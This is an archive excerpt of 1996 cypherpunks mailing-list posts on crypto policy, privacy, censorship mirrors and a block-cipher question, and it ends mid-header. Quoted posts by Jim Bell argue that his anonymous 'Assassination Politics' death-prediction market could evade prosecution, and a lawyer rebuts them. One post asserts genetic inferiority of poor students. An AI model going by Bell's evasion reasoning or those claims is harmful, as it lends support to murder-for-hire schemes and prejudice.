W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 26 Sep 1996 04:22:50 +0800
To: cypherpunks@toad.com
Subject: Re: unsubscibe
Message-ID: <ae6eba2c06021004d725@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:00 PM 9/25/96, Chip Mefford wrote:
>unsubscibe

"unsubscibe" is not a word. Nor is "unsuscrive," or "unscrive."

Send the correct word to the correct address, stated often here, and you
will be unsubscribed.

--Tim May


(Hint: majordomo@toad.com, with message body of "unsubscribe cypherpunks"
(no quotes))



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 26 Sep 1996 05:03:49 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous Mail at US Post
Message-ID: <ae6ebf21070210040126@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:45 AM 9/25/96, Greg Kucharo wrote:
>I don't know if anyone else has seen this, but I was mailing letters
>in the "out front" boxes the other day when I noticed a sign.  The sign
>said that all packages 16 ounces or over had to be taken inside for
>disposal into the mail slot. The obvious explanation being that even
>though you can abstain from marking a return address, the postal
>inspectors would like a nice photo of you with your mail.

Yes, this was the chief topic of discussion here a few weeks ago. :-}

One of the serious downsides of someone filtering out messages is that all
1400 of us then see the same topics presented again.

(This is more serious when people are forwarding long articles or press
releases, with sometimes half a dozen copies being received on the list.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 26 Sep 1996 10:21:01 +0800
To: cypherpunks@toad.com
Subject: Re: Medical Data
Message-ID: <ae6ec125080210047a7a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:27 PM 9/25/96, Asgaard wrote:
>On Tue, 24 Sep 1996, Timothy C. May wrote:
>
>> Why can't patients carry their _own_ medical records, and disclose what
>> they wish to disclose to doctors and hospitals, as they see fit? Whether
>> implemented in a high-tech version, as a "smart card," or a low-tech
>> version, as a "dossier" (a file folder), the principle's the same.
>
>One problem is when a patient is suing his doctor, but claiming that his
>'dossier' was lost in a fire. The doctor then has to defend himself
>with only 'your word against mine' instead of having his own account
>of what was happening on file, including test results etc that could
>be very interesting for the defence.

Well, this is a potentially confusing hypothetical, and a short paragraph
description doesn't do it justice.

- did not the patient have backups? if not, why not?

- the doctor will have records of what _he_ did, and records of _what was
disclosed to him_ by the patient. This should be enough, as his "end" has
done exactly what was agreed to.

(Indeed, the unrevealed parts of the dossier are not known to him, but then
they were "unrevealed," which is the whole point. That the "unrevealed"
parts were lost or destroyed in a head crash, or whatever, is not germane
at all.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 26 Sep 1996 01:36:01 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <199609250755.AAA14065@mail.pacifier.com>
Message-ID: <Pine.BSF.3.91.960925055255.10133G-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996, jim bell wrote:

> At 11:50 PM 9/24/96 -0400, Brian Davis wrote:
> >...
> >Amen to that.  Add that at least one lawyer (and former prosecutor) on 
> >the list is confident that successful prosecutions will ensue is AP ever 
> >gets off the ground. 
> 
> I don't doubt that there will be harassment.  (you can't deny that charges 
> would be brought even if it is tacitly agreed that no crime has been 
> committed; "the harassment-value" of such a prosecution would be desired 
> even if there is ultimately an acquittal.)  AP will resemble, more than 
> anything, gambling.  While gambling is illegal in some areas, it is quite 
> legal in others and there is no reason to believe that locales can't be 
> found in which an AP system could operate legally.

By "successful prosecutions" I mean convictions.  You can call a cow a 
duck, but it's still a cow. 



> Make American laws apply everywhere?  That'll be hard to justify, unless you 

You obviously are unfamiliar with the established concept of 
extraterritorial jurisdiction.

> want to unleash a world where an all people can be subject simultaneously to 
> the laws of EVERY country, should they choose to enforce them!  Would you 
> like to be arrested in Red China for something you said years earlier in 
> America about their leadership? 
> 
>  And are you ignoring the fact that the intentional isolation of one 
                                          ^^^^^^^^^^^
Are you ignoring the principle of "willful blindness"?

> participant from the knowledge of the actions and even the identity of the 
> others makes opportunities for prosecution on "conspiracy" charges mighty 
> slim.  And since AP can operate across traditional jurisdictional

I'm curious as to your qualifications to make the "mighty slim" judgment ...


 
> boundaries, you're going to have to explain how you can prosecute Person A 
> in Country B for giving a donation to an organization in Country C, to be 
> paid to a person D in country E for correctly predicting the death of person 
> F in country G, particularly when none of the identities of these people or 
> countries can be easily known given a well-crafted cryptographic and 
> message-routing system.  

Be glad too.  How much can you afford?

> 
>   Further, as you probably know as well as any, in order (at least, 
> supposedly!) to get a conviction you need to prove "mens rea," or "guilty 
> mind," and I suggest that none of the more passive participants in the AP 
> system have that.  (The ones who DON'T pick up a gun, knife, bomb, poison, 
> etc.)  Sure, they are aware that somewhere, sometime, somebody _may_ commit 
> a crime in order to collect a lottery, but they don't know who, what, when, 
> where, or how this will occur, if at all. (either before or after the fact!) 
>   In fact, since it is possible for a target to collect the reward himself 
> (to be directed toward his designee, obviously) by committing suicide and 
> "predicting" it, it isn't certain to the other participants that there has 
> even been any sort of crime committed!

Moo moo.* 


> Based on the mens rea requirement, I propose that there is plenty of room 
> for most of the participants to reasonably claim that they are guilty of no 
> crime.  They have carefully shielded themselves and others from any guilty 
> knowledge, and presumably they are entitled to protect themselves in this 
> way.  Morally, you could argue that these people are countenancing something 
> nasty, in the same sense that somebody could equally well argue that if you 
> buy a cheap shirt in Walmart you're partly responsible for sweatshop labor 
> in El Salvador.  True, I suppose, but moral guilt does not always translate 
> into legal guilt.
> 

Moo moo.*
> 
> > And yes, I've read Jim Bell's manifesto.  The fact 
> >that no lawyer has dissected it from a legal standpoint has been used by 
> >Mr. Bell as support for the propostion that it is legal.
> 
> I suggest that there is a greater likelihood that the "powers that be" will 
> just abandon all pretense of legality, and attempt to strike at the 
> participants if they can find them without benefit of any sort of trial. 
> This is a more plausible conclusion, because it cuts through all of the 
> legal difficulties which would hinder prosecution.  In effect, a low-level 
> undeclared war.  

I disagree that that will be the response, but you should be willing to 
allow one group of people to fight fire with fire.

EBD 



> 
> Jim Bell
> jimbell@pacifier.com
> 


* Calling a cow a duck doesn't make it one.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Thu, 26 Sep 1996 01:01:05 +0800
To: cypherpunks@toad.com
Subject: Re: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!]
Message-ID: <3.0b24.32.19960925063908.006821ec@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:23 AM 9/25/96 -0700, Dale Thorn <dthorn@gte.net> wrote:
[snip]
>I understood the intent of AP was to take powers the government is 
>already exercising (unconstitutionally), and merely transfer some of 
>them to the people, as it were.
[snip]

I always thought that the intent of AP was to bore me to tears and fill up
my mailbox with rubbish :)  



Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 26 Sep 1996 03:46:06 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
In-Reply-To: <32488A8F.6FF2@gte.net>
Message-ID: <Pine.SUN.3.91.960925072349.28222B-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 24 Sep 1996, Dale Thorn wrote:

> You are committing a logical fallacy with the above. You're saying that 
> the mugger who commits the crime with a stolen gun is equivalent to my 
> own hired hitmen (the local and federal police I pay so dearly for).

Incorrect.  Dale is assuming facts not in evidence.  See below.

> This is obviously not the case.  I didn't hire the mugger, nor did I 
> encourage the thief in an overt way.  But I did consciously select and 
> pay for the police and govt. assassins. 

Than perhaps attacks against Dale are appropriate since he takes
credit for supporting these people.

> And so did you.  Unless you're saying that the govt. forcibly
> takes you down to the voting booth, etc.

Well, I don't know what "etc." is supposed to include, but I 
don't vote.  But even assuming, arguendo, that I did, (a) I see
no support if I were to vote AGAINST government assassins who
are none the less elected, and (b) even a self-defense vote for 
the lesser of two evils is an awfully thin thread on which to 
hang a death sentence.  Should Sofie, in the movie, "Sofie's 
Choice" have been put to death because she exercise the "choice"
given to her of choosing which of her children was to live?  I 
don't think so.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 26 Sep 1996 00:21:32 +0800
To: cypherpunks@toad.com
Subject: Re: WARNING: This Message Actually Contains a Question
In-Reply-To: <199609250610.XAA23137@dfw-ix12.ix.netcom.com>
Message-ID: <us9suD24w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> writes:
> Bruce Schneier's book Applied Cryptography discusses
> Blowfish (no surprise, since it's his algorithm) and
> I think also discusses GOST.  Blowfish is very fast
> once you've finished the (deliberately slow) key schedule.
> It appears to be tolerably strong, though there hasn't
> been as much analysis on it as on RC4 or IDEA yet, much less DES.

A widely available C implementation of Blowfish had a bug, weakening
its security under some circumstances. Make sure to use the corrected
version. (The bug was in the C program, not the algorithm itself.)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@infonex.com>
Date: Thu, 26 Sep 1996 04:17:42 +0800
To: cypherpunks@toad.com
Subject: Re: We removed radikal 154 from xs4all :(
In-Reply-To: <199609242023.NAA10030@dns1.noc.best.net>
Message-ID: <v03007801ae6efda47143@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:45 AM -0700 9/24/96, James A. Donald wrote:
<SNIP>
>Every time one site capitulates, it will inspire two dozen others to
>join the fray.  I joined the fight *because* xs4all had to capitulate.
>

Speaking of which, is there a list of mirror sites? Just for the record:
http://www.cyberpass.net/radikal

	-Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Thu, 26 Sep 1996 00:35:41 +0800
To: aba@dcs.ex.ac.uk
Subject: Re: We removed radikal 154 from xs4all :(
Message-ID: <199609251240.IAA14357@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam, you know the german government did not win this one, and i know that
they did not win, my point was, will they, and other governments take this 
as a win and be encourgaged to press their luck with someone else.

	-paul

> From aba@dcs.ex.ac.uk Wed Sep 25 02:45:54 1996
> Date: Tue, 24 Sep 1996 17:21:16 +0100
> From: Adam Back <aba@dcs.ex.ac.uk>
> To: pjb@ny.ubs.com
> Cc: cypherpunks@toad.com
> Subject: Re: We removed radikal 154 from xs4all :(
> Content-Length: 989
> 
> 
> Paul <pjb@ny.ubs.com> writes:
> > i was under the impression that germany's goal was to stop the distribution
> > of radikal 154 by xs4all, not by 50 mirror sites.  they seem to have 
> > accomplished their goal. do you really think that they will let a little
> > thing like reason stand in their way when claiming victory?
> 
> They lost: it is still available.  If they went after another mirror
> the number of mirrors would double :-)
> 
> Someone in the German press needs to rub their noses in the fact that
> they lost, say by printing a list of URLS, or just mentioning the
> number of mirrors, and the different countries they are located in.
> 
> The need to translate the quote:
> 
> 	`The internet sees censorship as damage, and routes around it'
> 
> and put that in big letters.
> 
> Any German net freelance journalists reading?
> 
> Adam
> --
> #!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
> $/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
> lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: PhneCards@aol.com
Date: Thu, 26 Sep 1996 00:54:22 +0800
To: cypherpunks@toad.com
Subject: Stop Spammers Today!
Message-ID: <960925085324_292805914@emout19.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear cypherpunks;

In the last few days I have received numerous email coming from you but with
fake return addresses from messages posted on newsgroups.  I must have been
targeted because I am a bulk emailer.  Letting you know now that I am a
legitimate bulk emailer compiling my list with the permission of each account
holder.

If this barrage of email does not cease immediately, I will be forced to take
legal and maybe not so legal actions to defend myself.

If you would like to discuss this further, please call me at 407-438-8892.

Tim
===================================================

>Sender:	owner-cypherpunks@toad.com
>To:	cypherpunks@toad.com
>
>Timothy C. May wrote:
>> 
>> At 2:10 AM 9/24/96, hallam@vesuvius.ai.mit.edu wrote:
>> 
>> >like Markof are somewhat more responsible. This is not going to stop me
>> >from producing an op-ed piece linkiing the net libertarians to
>assasination
>> >politics unless I hear a few more repudiations of Bell's ideas. If you
>> >don't very clearly reject his murderous ideas you are going to regret it
>> >just as the left regreted having the USSR or the RAF associated with
them.
>> 
>> I for one don't respond well to extortion threats, so write your damned
>article.
>
>Seconded.
>
>You know, the real problem with the average blackmailer is that they
>rarely give you the offer as a legal document - if we fulfil our side of
>the bargain, how can we be sure he fulfils his, and doesn't change his
>mind next time someone half agrees with a pro
>AP/Legal-blackmail/Tax-haven/Libertarian-state/freedom-of-speech/whatever
>post?  We obviously need some sort of legal contract to solve this
>problem, but no, that's not possible in most countries, is it?.  How
>convenient.  Till next time Phill ...
>
>Gary
>--
>"Of course the US Constitution isn't perfect; but it's a lot better
>than what we have now."  -- Unknown.
>
>pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
>Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06
>
>
>----------------------- Headers --------------------------------
>From cypherpunks-errors@toad.com  Tue Sep 24 17:53:36 1996
>Return-Path: cypherpunks-errors@toad.com
>Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by
>emin27.mail.aol.com (8.6.12/8.6.12) with SMTP id RAA29223 for
><phnecards@aol.com>; Tue, 24 Sep 1996 17:53:34 -0400
>Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4)
>	id AA24368; Tue, 24 Sep 1996 15:53:31 -0600
>Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id GAA13291
for
>cypherpunks-outgoing; Tue, 24 Sep 1996 06:57:24 -0700 (PDT)
>Received: from smokey.systemics.com (smokey.systemics.com [193.67.124.65])
by
>toad.com (8.7.5/8.7.3) with SMTP id GAA13281 for <cypherpunks@toad.com>;
Tue,
>24 Sep 1996 06:57:12 -0700 (PDT)
>Received: from kampai.systemics.com
>(fLjlj5tpYpTi4i0Poa58tvhk9K+M7mOF@internal-mail.systemics.com
>[193.67.124.74]) by smokey.systemics.com (8.6.12/8.6.12) with SMTP id
>PAA12601; Tue, 24 Sep 1996 15:57:08 +0200
>Message-Id: <3247E8DF.FF6D5DF@systemics.com>
>Date: Tue, 24 Sep 1996 15:57:51 +0200
>From: Gary Howland <gary@systemics.com>
>Organization: Systemics Ltd.
>X-Mailer: Mozilla 3.0 (X11; I; FreeBSD 2.1.0-RELEASE i386)
>Mime-Version: 1.0
>To: cypherpunks@toad.com
>Subject: Re: Hallam-Baker demands more repudiations or he'll write!
>References: <ae6ca7190a021004d21c@[207.167.93.63]>
>Content-Type: text/plain; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Osborne <osborne@gateway.grumman.com>
Date: Thu, 26 Sep 1996 00:16:41 +0800
To: cypherpunks@toad.com
Subject: An idle thought on CBC and block lengths
Message-ID: <3.0b19.32.19960925085644.0068cb90@gateway.grumman.com>
MIME-Version: 1.0
Content-Type: text/plain


So I was sitting bored at home and thinking to myself: CBC is cool.
Without the key, you're screwed because a single bit error propagates
throughout the entire message.  But then I was thinking, yeah, but you can
still eventually get the ONE key.  So I began to wonder what the difference
in security is between encrypting an entire M with just one K in CBC, or
encrypting M with permutations of K over specific block lengths.

On the one hand you've got just one key, which makes it that much harder to
find in the keyspace.  On the other hand, If evil interloper Eve gets her
hands it, she has to find all of the keys to get all of M.  (Assuming she
is using brute force and can't necessarily find the master K to permute
into the subkeys.)

The downsides are of course that on the one side you've got just one key,
and once you get it, you get M.  But on the other hand, you can get any one
part of the message with less difficulty because of the higher number of
keys.  And, of course, if your master K is easy to brute force, then it's
actually worse than the first option.

Does anyone have opinions / knowledge of which is better?


____________________________________________________________
Rick Osborne                     osborne@gateway.grumman.com
"The universe doesn't give you any points for doing things that are easy."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Thu, 26 Sep 1996 03:46:20 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Medical Data
In-Reply-To: <ae6d921400021004c1d5@[207.167.93.63]>
Message-ID: <Pine.SOL.3.93.960925092456.13583A-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain


Of course, one area where the doctor will continue to hold a patient's
records, instead of the patient, due to the nature of the current system:

Prescription medication.

Of course, with the really big problems with this stuff, drug
interactions, there's still no system for a doctor to find out what you're
on thanks to another doctor. Which is why it's very important to always
use the same pharmacist.

Phil Fraering          The above is the opinion of neither my internet
pgf@acadian.net        service provider nor my employer.
318/261-9649               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 26 Sep 1996 04:28:20 +0800
To: cypherpunks@toad.com
Subject: Feds trying to stop judicial review of Commerce Dept export controls
Message-ID: <199609251631.JAA18345@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[They appear to be trying to transfer all the export controls from the
State Dept to the Commerce Dept -- including all the unconstitutional
and heavy-handed parts.		-- John]

Date: Wed, 25 Sep 1996 11:34:23 -0400
From: <djw@cdt.org> (Daniel J. Weitzner)

Memorandum
To:     Interested Parties
Re:     Proposed Amendments to Preclude Judicial Review in the Export
	Administration Act of 1996 (H.R. 361)
Date:   September 25, 1996

Failed U.S. encryption export controls continue to threaten Internet
security, individual privacy, and the competitiveness of U.S. industry.
Proposed amendments to H.R. 361, The Omnibus Export Administration Act of
1996 (see attached), would make this problem worse by preventing judicial
review of Commerce Department export control decisions, and should be
defeated.  These Amendments:

*       Would further entrench a failed U.S. encryption policy
*       Would provide extraordinary relief that is unjustified, and would
shift the balance of power in the ongoing public debate over Internet
security.
*       Will prevent judicial review of a broad area of public policy
affecting the First and Fourth Amendment rights of Americans.
*       Are inappropriate legislative meddling in ongoing controversies
*       Are unnecessary as the EAA already contains strict judicial review
provisions.

On balance, the Amendments would shelter the highly sensitive area of
Internet security from much-needed judicial scrutiny .  The Amendments are
inappropriate, unjustified, and should not be approved.

The Amendments entrench a failed U.S. encryption policy  -- Administration
export regulation of encryption keep U.S. computer users from protecting
their privacy online and damage the competitiveness of U.S. industry.
Three active cases in Federal Court are challenging these export controls.
Three bills have been proposed in this session of Congress with bipartisan
support to address what many believe to be the inappropriate application of
export controls to encryption exports.   The Amendments would further
entrench these controversial regulations by sheltering them from
much-needed judicial scrutiny.

The Amendments provide extraordinary, unjustified relief -- The Amendments
would preclude all judicial review under the Administrative Procedure Act,
including challenges to arbitrary and capricious rule-making or improper
statutory interpretation.  They would extend the already limited judicial
review provisions in the original EAA and H.R.361 to preclude nearly all
substantive review.   Congress has made no findings that would suggest that
such unusual relief is warranted.  Typically, relief from judicial review
might be granted in areas where excessive or inappropriate litigation is
feared in areas that Congress feels are well-settled.  Such is not the case
here.  The problem with encryption export controls has not been too much
litigation.

The Amendments prevent judicial review of decisions that implicate First,
Fourth, and Fifth Amendment rights -- Export controls have been the
Administration's exclusive vehicle for the its key escrow encryption
proposals -- which have a grave impact on American's First, Fourth, and
Fifth amendment right.  The Amendments would thus preclude judicial review
in an area broadly affecting the rights of individuals and the growth of a
new medium.

The Amendments will likely interfere with important cases and controversies
-- These Amendments would raise a serious impediment to those seeking
judicial relief from what many believe to be unfair encryption export
control policies.  Judicial review provisions in the EAA and the Arms
Export Control Act (AECA) were the basis for a federal judge's recent
dismissal of a challenge to the encryption export controls.   The EAA
provisions will soon take on added significance as it is widely believed
that the Administration will shift jurisdiction over encryption export
controls from the State Department to the Commerce Department in the near
future.

The Amendments are unnecessary -- H.R. 361 as passed by the House already
contains significant judicial review limitations.  The bill already
provides unusual constraints -- on both subject matter and venue -- for
challenges to Commerce decision-making under the Act. There is little to
indicate that the further extraordinary relief of these Amendments is
required.

*  *  *  *  *

Encryption export controls represent an area where it is widely believed
that the Administration is abusing its discretion in order to use powerful
export regulations to influence the domestic market for and use of
important technologies.  Without recourse in the Executive Branch -- or in
Congress this session -- concerned parties have been forced to turn to the
courts.  It is in just such a critical area where parties are most in need
of judicial review.  The Amendments suggested would serve to deny
individuals and companies their much-needed day in court, have not been
justified, and should not be approved.

For more information, please contact:

                Daniel Weitzner, Deputy Director        <djw@cdt.org>
                Alan Davidson, Staff Counsel            <abd@cdt.org>

                Center for Democracy and Technology
                (202) 637-9800

Amendments to
The Omnibus Export Administration Act of 1996 (H.R. 361)


1.  Amendment to Section 112 (Administrative and Judicial Review)

Text:

On page 125, at line 17 in Section 112, insert:

"The provisions of this section shall constitute the exclusive basis for
judicial review of any agency action taken pursuant to this title and the
regulations promulgated thereunder."

On page 126, at line 1 in Section 112(a)(2), insert "only" between
"reviewed" and "by appeal".

On page 126, at line 3 in Section 112(a)(2), insert "and only" between
"Circuit," and "to the extent".

On page 126, at line 6 in Section 112(a)(2)(A), strike (A) and replace as
follows:

"(A) regulations fail to provide for procedures required by this title;".

On page 126, at line 12 in Section 112(a)(2)(B), insert "procedural
requirements of" between "violates" and "this title;".

On page 127, at line 5 in Section 112(a)(2)(H), insert "procedural" between
"with the" and "requirements".

On page 127, at line 7, add a new paragraph (3) to Section 112(a) as follows:

"Preclusion of Review. -- Substantive decisions of the Secretary and other
officials on (i) whether to impose, expand, or extend export controls on
any commodity or technology, (ii) whether and how to revise the Commodity
Control Index, (iii) whether and under what conditions to grant, deny, or
modify any export license, and (iv) any other questions of law or fact
under this title (except as otherwise provided in subsections (b)-(d) of
this section), shall be final and conclusive and no court shall have power
or jurisdiction to review any such decision by an action in the nature of
mandamus or otherwise."


============================================================================
Daniel J. Weitzner, Deputy Director                       <djw@cdt.org>
Center for Democracy and Technology                       202.637.9800 (v)
1634 Eye St., NW Suite 1100                               202-637.0968 (f)
Washington, DC 20006                                      http://www.cdt.org/

* PROTECT THE INTERNET AND THE FUTURE OF FREE SPEECH IN THE INFORMATION AGE *
      Join the legal challenge against the Communications Decency Act!
               For More Information, Visit the CIEC Web Page
                         http://www.cdt.org/ciec/
                       or email <ciec-info@cdt.org>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Thu, 26 Sep 1996 04:00:16 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Public Schools
In-Reply-To: <20uRuD1w165w@bwalk.dm.com>
Message-ID: <Pine.SOL.3.93.960925093100.13583B-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> You must have attended a public school if you don't understand that geentic
> superiority leads to economic success.  My older kid goes to a private school.
> The parents are obviously genetically superior to public school parents.

Stop wallowing around in determinism if you expect to get anywhere.

> > And the reason it costs so much to send a kid to private school is that
> > everyone's already paying for a more expensive public school thanks to all
> > the taxes.
> 
> Push vouchers. What's the cryptorelevance of your comments, anyway?

Without vouchers, you don't say anything about the intelligence of your
test subjects; to a _very_ large degree, intelligence isn't genetic. Or
it helps for the first five minutes, but after that you're on your own.

"The world is full of unrewarded genius..." 

> > So if I'm economically successful it'll change my genes?
> > 
> > I guess this is the famous Russian belief in Lamarkianism in action.
> No, on the contrary, sending poor kids to good schools on scholarships
> does not improve their genes. They tend to become drug dealers.

At the private school I went to this was not the case. Only the spoiled
rich kids were that stupid, although by your definitions, they should
have been smarter than that.

> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 

Phil Fraering          The above is the opinion of neither my internet
pgf@acadian.net        service provider nor my employer.
318/261-9649               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Thu, 26 Sep 1996 03:44:32 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: ISPs' information on users
In-Reply-To: <ae6df1260502100417f8@[207.167.93.63]>
Message-ID: <Pine.SOL.3.93.960925094228.13583E-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Sep 1996, Timothy C. May wrote:

> (There's a certain new ISP with tight links to a quasi-religious group much
> in the news lately, and some have speculated that this ISP may be
> monitoring certain users....)
> 
> --Tim May

Which ISP and religious group is this?

Phil Fraering          The above is the opinion of neither my internet
pgf@acadian.net        service provider nor my employer.
318/261-9649               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Thu, 26 Sep 1996 03:49:28 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <Pine.BSF.3.91.960924234700.18469S-100000@mercury.thepoint.net>
Message-ID: <Pine.SOL.3.93.960925094517.13583F-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain


I guess the final word on assasination politics would be obvious:

It's widely believed that the New Orleans Mafia (the source of my recent
statement about body decomposition in Louisiana swamps) was a prime driver
in the assasination of the late President John F. Kennedy.

I think it's fairly safe to say that having done this didn't do them a
damn bit of good. It didn't do anyone else a damn bit of good.

The world remained just as corrupt as it always was.

Phil Fraering          The above is the opinion of neither my internet
pgf@acadian.net        service provider nor my employer.
318/261-9649               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmefford@avwashington.com (Chip Mefford)
Date: Thu, 26 Sep 1996 02:14:49 +0800
To: cypherpunks@toad.com
Subject: unsubscibe
Message-ID: <v01540b04ae6eeb4143d4@[207.79.65.35]>
MIME-Version: 1.0
Content-Type: text/plain


unsubscibe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 26 Sep 1996 02:22:45 +0800
To: cypherpunks@toad.com
Subject: Re: Where to write crypto?
In-Reply-To: <v02130500ae6d5aa9e163@[10.0.2.15]>
Message-ID: <Pine.A32.3.91.960925095820.25114A@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 24 Sep 1996, Steve Schear wrote:

> I believe Taiwan might be an excellent location to have 'clear room' crypto
> work done.  Taiwan has a very large skilled software labor pool and isn't a
> member of COCOM.
Why go so far, when you can export crypto from Anguila or Canada. The 
first is right next to Florida and is a tax haven, the second has a large 
talent pool and the same qulity telecom as the States. The main problem is 
concealing the fact that there may be any Americans involved. Both save 
you the trouble of learning Chinese.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: makof@alias.cyberpass.net (makofi)
